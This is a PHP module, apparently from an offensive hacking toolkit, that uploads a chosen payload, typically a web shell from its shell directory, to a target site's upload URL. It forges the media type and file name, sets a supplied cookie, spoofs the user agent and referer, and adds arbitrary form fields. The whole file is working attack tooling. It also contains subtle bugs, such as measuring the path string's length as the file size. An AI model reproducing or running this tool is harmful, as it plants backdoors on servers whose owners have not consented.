<?php
/*
Handler for Header Forge

ModGlue Variables:
$_CONTEXT['thc_mm']['urlparts']
$_CONTEXT['thc_mm']['payloadfile']
$_CONTEXT['thc_mm']['posted_vars']
$_CONTEXT['thc_mm']['media']
$_CONTEXT['thc_mm']['payloadfilesize']
$_CONTEXT['thc_mm']['curlhandle']
$_CONTEXT['thc_mm']['postvalues']

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 11-08-2024
*/
set_time_limit(0);
$_MODULE_C = "thc_mm";
$_CONTEXT['thc_mm'] = array();
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
include_once($_PATHS['data_root']."/mediatypes.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br />\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br />\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(isset($_POST['sUploadUrl'])){
	// validate path
	$_CONTEXT['thc_mm']['urlparts'] = parse_url($_POST['sUploadUrl']);
	if(!isset($_CONTEXT['thc_mm']['urlparts']['host']) || !isset($_CONTEXT['thc_mm']['urlparts']['path'])){
		die(Screen($sOut."<b id=h7>Expecting url path to file</b>".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
	}
	// validate payload
	if(isset($_FILES['sUpload']['tmp_name'])){
		// upload file from your own computer
		$_CONTEXT['thc_mm']['payloadfile'] = $_FILES['sUpload']['tmp_name'];
	}
	else{
		// use a file from the shell directory
		$_CONTEXT['thc_mm']['payloadfile'] = $_PATHS['shell_root']."/".ExploitFilter($_POST['sShell'],0,1);
	}
	// create modglue variables for posted content
	$_CONTEXT['thc_mm']['posted_vars'] = array();
	foreach($_POST as $sKey=>$sValue){
		if(is_string($sValue)){
			$_CONTEXT['thc_mm']['posted_vars'][$sKey] = trim($sValue);
		}
		$_CONTEXT['thc_mm']['posted_vars'][$sKey] = $sValue;
	}
	// validate media type
	$_CONTEXT['thc_mm']['media'] = explode("/",$_CONTEXT['thc_mm']['posted_vars']['sMedia']);
	if(count($_CONTEXT['thc_mm']['media'])!=2){
		die(Screen($sOut."<b id=h7>Invalid media type</b>".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
	}
	if(false==($_CONTEXT['thc_mm']['payloadfilesize'] = @strlen($_CONTEXT['thc_mm']['payloadfile']))){
		die(Screen($sOut."<b id=h7>Failed to get file data or no data available</b>".$sEnd,$_CONTEXT['verbose'],$_CONTEXT['silent']));
	}
	else{
		// start upload
		$_CONTEXT['thc_mm']['curlhandle'] = curl_init($_CONTEXT['thc_mm']['urlparts']['scheme']."://".$_CONTEXT['thc_mm']['urlparts']['host']."/".$_CONTEXT['thc_mm']['urlparts']['path']);
		$_CONTEXT['thc_mm']['postvalues'] = curl_file_create($_CONTEXT['thc_mm']['payloadfile'],$_CONTEXT['thc_mm']['posted_vars']['sMedia'],$_CONTEXT['thc_mm']['posted_vars']['sFileName']);
		$_CONTEXT['thc_mm']['postvalues'] = array($_CONTEXT['vars']['sVarUpload']=>$_CONTEXT['thc_mm']['postvalues']);
		curl_setopt($_CONTEXT['thc_mm']['curlhandle'],CURLOPT_POST,1);
		if(isset($_CONTEXT['thc_mm']['posted_vars']['sCookie']) && !empty($_CONTEXT['thc_mm']['posted_vars']['sCookie'])){
			curl_setopt($_CONTEXT['thc_mm']['curlhandle'],CURLOPT_COOKIE,$_CONTEXT['thc_mm']['posted_vars']['sCookie']);
		}
		if(isset($_CONTEXT['thc_mm']['posted_vars']['sAgent']) && !empty($_CONTEXT['thc_mm']['posted_vars']['sAgent'])){
			curl_setopt($_CONTEXT['thc_mm']['curlhandle'],CURLOPT_USERAGENT,$_CONTEXT['thc_mm']['posted_vars']['sAgent']);
		}
		if(isset($_CONTEXT['thc_mm']['posted_vars']['sReferer']) && !empty($_CONTEXT['thc_mm']['posted_vars']['sReferer'])){
			curl_setopt($_CONTEXT['thc_mm']['curlhandle'],CURLOPT_REFERER,$_CONTEXT['thc_mm']['posted_vars']['sReferer']);
		}
		if(isset($_CONTEXT['thc_mm']['posted_vars']['sOtherVar']) && !empty($_CONTEXT['thc_mm']['posted_vars']['sOtherVar'])){
			$aVars = explode("&",$_CONTEXT['thc_mm']['posted_vars']['sOtherVar']);
			for($x=0;$x<count($aVars);$x++){
				$aVals = @explode("=",$aVars[$x]);
				$_CONTEXT['thc_mm']['postvalues'][$aVals[0]] = $aVals[1];
			}
		}
		curl_setopt($_CONTEXT['thc_mm']['curlhandle'],CURLOPT_POSTFIELDS,$_CONTEXT['thc_mm']['postvalues']);
		echo $sOut;
		$sResult = curl_exec($_CONTEXT['thc_mm']['curlhandle']);
		echo $sEnd;
		curl_close($_CONTEXT['thc_mm']['curlhandle']);
	}
}
else{
	echo $sOut;
	echo $sOptions;
	echo $sEnd;
	exit;
}
?>